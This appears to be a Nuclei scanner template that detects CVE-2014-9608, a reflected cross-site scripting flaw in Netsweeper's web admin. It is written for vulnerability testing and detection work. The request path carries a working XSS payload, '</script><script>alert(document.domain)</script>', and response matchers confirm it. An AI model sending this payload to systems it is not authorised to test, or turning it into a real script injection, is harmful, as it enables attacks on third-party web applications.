58 lines
1.9 KiB
YAML
58 lines
1.9 KiB
YAML
id: CVE-2014-9608
|
|
|
|
info:
|
|
name: Netsweeper 4.0.3 - Cross-Site Scripting
|
|
author: daffainfo
|
|
severity: medium
|
|
description: |
|
|
A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
|
|
remediation: |
|
|
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2014-9608
|
|
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2014-9608
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00102
|
|
epss-percentile: 0.41516
|
|
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: netsweeper
|
|
product: netsweeper
|
|
tags: cve,cve2014,netsweeper,xss,packetstorm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '</script><script>alert(document.domain)</script>'
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'webadminU='
|
|
- 'webadmin='
|
|
condition: or
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- text/html
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a004630440220069781b5b497e297bc5381b6144f988be8bcf7bac125a1c4adcce22b72f1abfc02206b2e3cb20c1dcc290b8b42f38a73de9689129280aea1a2e0e87c1a9f42c2f9c2:922c64590222798bb761d5b6d8e72950
|